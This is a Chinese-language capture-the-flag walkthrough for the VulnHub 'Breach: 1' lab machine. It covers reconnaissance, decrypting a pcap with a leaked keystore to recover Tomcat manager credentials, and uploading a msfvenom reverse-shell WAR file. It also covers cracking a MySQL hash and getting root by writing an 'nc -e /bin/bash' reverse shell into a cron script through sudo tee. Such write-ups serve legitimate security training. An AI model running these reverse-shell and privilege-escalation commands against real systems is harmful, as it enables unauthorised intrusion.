breach-1--vulnhub靶场

目录

一、环境搭建

下载靶场Breach: 1 ~ VulnHub

描述

VM 配置了静态 IP 地址 （192.168.110.140），因此需要将仅主机适配器配置到此子网。

网络设置也可用其他模式
网络模式：NAT
靶机地址：

192.168.110.140

kali地址：192.168.110.128

二、信息收集

（1）nmap 端口扫描

所有端口都开放，应该是对扫描做了防护，

nmap -p- 192.168.110.140

换成-sF 试试

nmap -p- -sF 192.168.110.140

（2）网站指纹识别

直接ip访问80端口，查看源码

获得的字符串长度为64
两次base64解码得到应该是 账号密码

pgibbons:damnitfeel

      g 
     
    
      o 
     
    
      o 
     
    
      d 
     
    
      t 
     
    
      o 
     
    
      b 
     
    
      e 
     
    
      a 
     
    
      g 
     
    
      a 
     
    
      n 
     
    
      g 
     
    
   
     goodtobeagang 
    
   
 goodtobeagangta

点击最初的界面图片跳转获取登录界面

• 登录后发现三封邮件 第3封邮件:有一个peter的SSL证书被保存在192.168.110.140/.keystore。

访问

http://192.168.110.140/.keystore

下载包含SSL证书的密钥库keystore文件，keystore是存储公私密钥的一种文件格式

继续收集网站信息

可以看到一个名为：

_SSL_test_phase1.pcap

的Wireshark流量包文件，提示 别名、存储密码和密钥密码都设置为“tomcat”，下载它

三、由keystore和pcap得到tomcat后台

（1）kali的keytool提取SSL证书

keytool -list -keystore /root/下载/keystore

口令tomcat

keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12

（2）导入证书

编辑–首选项–Protocols-TLS，端口用之前-sF获得的8443端口

流量分析
导入证书后，https流量已经被解密
tomcat采用http basic认证,认证数据包如下,wireshark自动解密

https://192.168.110.140:8443/_M@nag3Me/html
tomcat:Tt\5D8F(#!*u=G)4m7zB

（3）进入tomcat后台

直接访问数据包中的网址，出错

使用burpsuite代理访问，输入tomcat:Tt\5D8F(#!*u=G)4m7zB

登陆后，发现可利用的文件上传点

（4）获取shell

然后利用

msfvenom

生成

war格式

的反弹shell，命令：

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=4444 -f war -o getshell.war

在kali中开启msf进入监听

访问https://192.168.110.140:8443/getshell/,等几秒，kali获得反弹shell

python -c 'import pty;pty.spawn("/bin/bash")'

得到交互shell

四、提权

（1）信息查找

在

/var/www/5446

文件夹下发现了一个文件在里面找到了

数据库的用户名和密码

cat 0d93f85c5061c44cdffeb8381b2772fd.php 

连接数据库

mysql -u root -p

在mysql库user表发现

User: milton

Password: 6450d89bd3aff1d893b85d3ad65d2ec2

得到milton用户的密码哈希：

6450d89bd3aff1d893b85d3ad65d2ec2

到

https://www.somd5.com/

解密，得到用户milton的明文密码：thelaststraw

（2）切换用户milton

看到历史命令su提权到了blumbergh用户,需要找到blumbergh用户的密码

发现了7张图片，6张在图片目录：

http://192.168.110.140/images/

，1张在milton用户目录下：

将图片复制到kali linux，使用strings打印各图片其中的可打印字符,在bill.png图片中

coffeestains

（2）切换用户blumbergh

tidyup.sh这是一段清理脚本，描述中说明每3分钟执行清理，删除webapps目录下的文件，因此之前上传的菜刀马总是被删除，需要重新上传。

查看tidyup.sh的权限，对该脚本没有写入权限，只有root可以

echo"nc -e /bin/bash 192.168.110.128 2345"> shell.txt

cat shell.txt |sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

在kali开启监听2345端口，等待

提权成功！！！